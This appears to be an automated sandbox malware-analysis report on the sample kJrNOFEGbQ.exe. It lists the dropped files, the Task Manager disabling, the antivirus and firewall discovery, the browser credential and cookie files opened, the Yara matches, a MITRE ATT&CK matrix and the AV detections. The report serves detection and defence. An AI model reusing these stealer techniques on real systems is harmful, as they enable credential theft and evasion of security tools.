                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeQueries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeQueries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeQueries volume information: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeQueries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeQueries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeQueries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0037DF1E
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0036B146 GetVersionExW,0_2_0036B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Lowering of HIPS / PFW / Operating System Security Settings

                                    barindex
                                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                                    Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000008.00000002.2010012696.0000000012E0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Mscommon.exe PID: 8024, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7548, type: MEMORYSTR
                                    Source: Yara matchFile source: kJrNOFEGbQ.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 8.0.Mscommon.exe.5c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1661222491.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000008.00000000.1951066729.00000000005C2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1660775907.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\hyperComponentFontDhcp\Mscommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\cmd.exe, type: DROPPED
                                    Source: Yara matchFile source: kJrNOFEGbQ.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 8.0.Mscommon.exe.5c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\hyperComponentFontDhcp\Mscommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\cmd.exe, type: DROPPED
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                    Remote Access Functionality

                                    barindex
                                    Source: Yara matchFile source: 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000008.00000002.2010012696.0000000012E0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Mscommon.exe PID: 8024, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7548, type: MEMORYSTR
                                    Source: Yara matchFile source: kJrNOFEGbQ.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 8.0.Mscommon.exe.5c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1661222491.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000008.00000000.1951066729.00000000005C2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1660775907.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\hyperComponentFontDhcp\Mscommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\cmd.exe, type: DROPPED
                                    Source: Yara matchFile source: kJrNOFEGbQ.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 8.0.Mscommon.exe.5c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\hyperComponentFontDhcp\Mscommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\cmd.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts241
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    1
                                    DLL Side-Loading
                                    21
                                    Disable or Modify Tools
                                    1
                                    OS Credential Dumping
                                    1
                                    System Time Discovery
                                    1
                                    Taint Shared Content
                                    1
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API
                                    1
                                    DLL Side-Loading
                                    12
                                    Process Injection
                                    1
                                    Deobfuscate/Decode Files or Information
                                    LSASS Memory3
                                    File and Directory Discovery
                                    Remote Desktop Protocol1
                                    Data from Local System
                                    1
                                    Non-Application Layer Protocol
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter
                                    1
                                    Scheduled Task/Job
                                    1
                                    Scheduled Task/Job
                                    3
                                    Obfuscated Files or Information
                                    Security Account Manager157
                                    System Information Discovery
                                    SMB/Windows Admin Shares1
                                    Clipboard Data
                                    11
                                    Application Layer Protocol
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Scheduled Task/Job
                                    31
                                    Registry Run Keys / Startup Folder
                                    31
                                    Registry Run Keys / Startup Folder
                                    1
                                    Software Packing
                                    NTDS351
                                    Security Software Discovery
                                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading
                                    LSA Secrets2
                                    Process Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    File Deletion
                                    Cached Domain Credentials261
                                    Virtualization/Sandbox Evasion
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items32
                                    Masquerading
                                    DCSync1
                                    Application Window Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    Modify Registry
                                    Proc Filesystem1
                                    Remote System Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
                                    Virtualization/Sandbox Evasion
                                    /etc/passwd and /etc/shadow1
                                    System Network Configuration Discovery
                                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                                    Process Injection
                                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583905 Sample: kJrNOFEGbQ.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Antivirus detection for URL or domain 2->82 84 16 other signatures 2->84 10 kJrNOFEGbQ.exe 3 6 2->10         started        13 cmd.exe 2->13         started        17 cmd.exe 2->17         started        19 9 other processes 2->19 process3 dnsIp4 58 C:\hyperComponentFontDhcp\Mscommon.exe, PE32 10->58 dropped 21 wscript.exe 1 10->21         started        76 193.58.121.137, 49736, 49737, 49738 DCHASSELTBE Germany 13->76 60 C:\Users\user\Desktop\zepZsevX.log, PE32 13->60 dropped 62 C:\Users\user\Desktop\vwiBQQWj.log, PE32 13->62 dropped 64 C:\Users\user\Desktop\spksuybo.log, PE32 13->64 dropped 66 18 other malicious files 13->66 dropped 106 Tries to harvest and steal browser information (history, passwords, etc) 13->106 108 Antivirus detection for dropped file 17->108 110 Multi AV Scanner detection for dropped file 17->110 112 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->112 114 2 other signatures 17->114 file5 signatures6 process7 signatures8 92 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->92 24 cmd.exe 1 21->24         started        process9 process10 26 Mscommon.exe 6 41 24->26         started        30 reg.exe 1 1 24->30         started        32 conhost.exe 24->32         started        file11 68 C:\Users\user\Desktop\wwCruhPB.log, PE32 26->68 dropped 70 C:\Users\user\Desktop\vIyiJTTD.log, PE32 26->70 dropped 72 C:\Users\user\Desktop\qVgkgWEP.log, PE32 26->72 dropped 74 24 other malicious files 26->74 dropped 94 Multi AV Scanner detection for dropped file 26->94 96 Creates an undocumented autostart registry key 26->96 98 Creates multiple autostart registry keys 26->98 104 3 other signatures 26->104 34 cmd.exe 1 26->34         started        37 csc.exe 4 26->37         started        40 schtasks.exe 26->40         started        42 14 other processes 26->42 100 Disable Task Manager(disabletaskmgr) 30->100 102 Disables the Windows task manager (taskmgr) 30->102 signatures12 process13 file14 86 Uses ping.exe to sleep 34->86 88 Uses ping.exe to check the status of other devices and networks 34->88 44 conhost.exe 34->44         started        46 chcp.com 34->46         started        48 PING.EXE 34->48         started        50 ruRRsbcJNKBbiFjvLZZICNpuYz.exe 34->50         started        56 C:\Windows\...\SecurityHealthSystray.exe, PE32 37->56 dropped 90 Infects executable files (exe, dll, sys, html) 37->90 52 conhost.exe 37->52         started        54 cvtres.exe 1 37->54         started        signatures15 process16

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand
                                    SourceDetectionScannerLabelLink
                                    kJrNOFEGbQ.exe74%ReversingLabsWin32.Trojan.Uztuby
                                    kJrNOFEGbQ.exe100%AviraVBS/Runner.VPG
                                    kJrNOFEGbQ.exe100%Joe Sandbox ML
                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\Desktop\AEzAQzJw.log100%AviraHEUR/AGEN.1362695
                                    C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\RrReMzQm.log100%AviraHEUR/AGEN.1300079
                                    C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\QCZpVjcx.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\WGSwrSeE.log100%AviraHEUR/AGEN.1300079
                                    C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\CXEIeahW.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\Desktop\RTAxOVPQ.log100%AviraTR/AVI.Agent.updqb
                                    C:\ProgramData\SoftwareDistribution\cmd.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\Desktop\TnEFcwnq.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\JmTPAbOe.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\PIewODkQ.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\AEzAQzJw.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\KVMxlGUc.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\RrReMzQm.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\LSnFHGjW.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\WGSwrSeE.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\JVsHHpbK.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\CXEIeahW.log100%Joe Sandbox ML
